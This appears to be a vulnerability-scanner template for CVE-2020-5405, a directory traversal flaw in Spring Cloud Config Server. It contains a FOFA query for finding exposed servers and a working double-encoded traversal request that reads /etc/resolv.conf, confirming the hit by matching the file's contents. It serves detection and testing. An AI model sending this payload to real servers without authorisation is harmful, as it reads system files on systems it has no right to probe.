漏洞描述
Spring Cloud Config Server Directory Traversal
fofa: "Spring Cloud Config Server"
id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
author: kingkk
severity: medium
description: |
Spring Cloud Config Server Directory Traversal
fofa: "Spring Cloud Config Server"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
tags: cve,cve2020,springcloud,traversal,readfile
created: 2023/08/17
rules:
r0:
request:
method: GET
path: /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit."))
expression: r0()